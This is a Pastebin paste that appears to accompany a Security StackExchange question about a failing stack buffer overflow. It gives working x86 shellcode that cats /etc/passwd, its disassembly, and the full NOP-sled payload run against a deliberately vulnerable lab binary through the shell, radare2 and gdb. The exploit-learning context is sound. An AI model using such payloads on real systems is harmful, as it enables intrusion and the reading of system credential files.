SHARE
TWEET

Question details

a guest Jan 14th, 2017 71 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // Question URL: http://security.stackexchange.com/questions/148351/
  2. // Shellcode, which I built and intend to cat /etc/passwd. It worked just fine on several exploits I did before:
  3. char[] shellcode = "\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\x52\x51\x53\x89\xe1\xb0\x0b\xcd\x80"
  4.  
  5. // Objdump of shellcode file:
  6. $ objdump -d shellcode.o
  7.  
  8. shellcode.o:     file format elf32-i386
  9.  
  10. Disassembly of section .text:
  11.  
  12. 00000000 <_start>:
  13.    0:   31 c0                   xor    %eax,%eax
  14.    2:   99                      cltd
  15.    3:   52                      push   %edx
  16.    4:   68 2f 63 61 74          push   $0x7461632f
  17.    9:   68 2f 62 69 6e          push   $0x6e69622f
  18.    e:   89 e3                   mov    %esp,%ebx
  19.   10:   52                      push   %edx
  20.   11:   68 73 73 77 64          push   $0x64777373
  21.   16:   68 2f 2f 70 61          push   $0x61702f2f
  22.   1b:   68 2f 65 74 63          push   $0x6374652f
  23.   20:   89 e1                   mov    %esp,%ecx
  24.   22:   52                      push   %edx
  25.   23:   51                      push   %ecx
  26.   24:   53                      push   %ebx
  27.   25:   89 e1                   mov    %esp,%ecx
  28.   27:   b0 0b                   mov    $0xb,%al
  29.   29:   cd 80                   int    $0x80
  30.  
  31.  
  32. ----------
  33.  
  34. // Command lines and arguments:
  35. // I try to exploit the program using several ways, I'll paste here few:
  36.  
  37. // Simple shell execute //
  38. $ ./vuln $(python -c 'print "\x90"*28 + "\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\x52\x51\x53\x89\xe1\xb0\x0b\xcd\x80" + "A"*5 + "\xd4\xd4\xff\xff"')
  39.  
  40. // or read the payload from a file
  41. $ ./vuln $(cat payload)
  42.  
  43.  
  44. // RADARE2 //
  45. // Open the program in radare2:
  46. $ r2 -d ./vuln // open in debug mode
  47.  
  48. // inside r2:
  49. // Reopen in debugger mode with args
  50. doo `!!python -c 'print "\x90"*28 + "\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\x52\x51\x53\x89\xe1\xb0\x0b\xcd\x80" + "A"*5 + "\xd4\xd4\xff\xff"'`
  51.  
  52.  
  53. // GDB //
  54. (gdb) run $(python -c 'print "\x90"*28 + "\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\x52\x51\x53\x89\xe1\xb0\x0b\xcd\x80" + "A"*5 + "\xd4\xd4\xff\xff"')
  55.  
  56.  
  57.  
  58. // System details //
  59. $ uname -a
  60. Linux megabeets 4.4.0-34-generic #53-Ubuntu SMP Wed Jul 27 16:06:39 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
  61.  
  62. $ file vuln
  63. ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=47ddbe5ef3c4c647670a8be51f2975c11a3501a6, not stripped
  64.  
  65. // The program compiled using this GCC Command
  66. $ gcc vuln.c -o vuln -fno-stack-protector -m32 -z execstack
  67.  
  68.  ///////////////////
  69.  // More details //
  70.  /////////////////
  71.  
  72.  // Offset in payload that is overriding EIP: 76
  73.  // Payload length: 80
  74.  // NOP-sled length: 28
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top